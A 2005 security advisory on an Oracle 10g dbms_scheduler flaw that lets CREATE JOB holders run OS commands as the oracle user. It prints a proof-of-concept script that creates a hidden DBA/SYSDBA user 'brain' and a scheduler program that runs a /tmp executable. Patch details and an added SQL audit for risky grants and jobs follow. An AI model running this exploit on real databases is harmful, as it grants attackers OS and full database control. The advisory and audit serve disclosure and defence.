Oracle 10g Exploit dbms_scheduler
Details

The following proof-of-concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle.

Example

    #!/bin/ksh
    set -a
    echo "Operator, are you pondering what I am pondering?" >/dev/console
    ORAENV_ASK=NO
    ORACLE_SID=<sid>
    . /usr/local/bin/oraenv
    sqlplus "/ as sysdba" <<EOF
    create user brain identified by takeover default tablespace system;
    grant connect,resource,dba to brain;
    grant sysdba to brain;
    EOF

    BEGIN
      DBMS_SCHEDULER.CREATE_PROGRAM (
        program_name   => 'take_over_the_world',
        program_action => '/tmp/pinky_and_the_brain',
        program_type   => 'EXECUTABLE',
        comments       => 'I rulez');
    END;
    /

Patch Information

This bug is fixed by applying the patchset for Oracle alert 68 or a later patchset.

References

Pete Finnigan's Security Advisory - Bug in dbms_scheduler

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
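An audit for the condition described under Details, added here as an example and not part of the original advisory: it lists who holds job-creation privileges and which scheduler programs and jobs run OS executables. It assumes a DBA-privileged session and the standard data dictionary views DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_SCHEDULER_PROGRAMS and DBA_SCHEDULER_JOBS; the grantee in the final comment is a placeholder.

```sql
-- Added audit example (not from the advisory). Run as a DBA-privileged user.

-- 1. Direct grants of the job-creation privileges.
--    CREATE EXTERNAL JOB only exists from 10g Release 2 onward.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB')
ORDER  BY grantee, privilege;

-- 2. Grantees that receive the same privileges through a role
--    (one level only; nested roles need a hierarchical query).
SELECT rp.grantee, rp.granted_role, sp.privilege
FROM   dba_role_privs rp
JOIN   dba_sys_privs  sp ON sp.grantee = rp.granted_role
WHERE  sp.privilege IN ('CREATE JOB', 'CREATE ANY JOB', 'CREATE EXTERNAL JOB')
ORDER  BY rp.grantee, rp.granted_role;

-- 3. Scheduler programs that point at an OS executable, as in the
--    advisory's example (program_type => 'EXECUTABLE').
SELECT owner, program_name, program_action, enabled, comments
FROM   dba_scheduler_programs
WHERE  program_type = 'EXECUTABLE'
ORDER  BY owner, program_name;

-- 4. Jobs that run an OS executable directly or through such a program.
SELECT j.owner, j.job_name, j.job_type, j.job_action,
       j.program_owner, j.program_name, j.enabled, j.state
FROM   dba_scheduler_jobs j
LEFT   JOIN dba_scheduler_programs p
       ON  p.owner        = j.program_owner
       AND p.program_name = j.program_name
WHERE  j.job_type = 'EXECUTABLE'
   OR  p.program_type = 'EXECUTABLE'
ORDER  BY j.owner, j.job_name;

-- 5. Where a grantee from queries 1 or 2 has no need to create jobs,
--    remove the privilege (placeholder grantee, fill in per finding):
-- REVOKE CREATE JOB FROM <grantee>;
```

Any row from queries 3 or 4 whose owner or action path is not a known maintenance task is worth reviewing alongside the grants from queries 1 and 2.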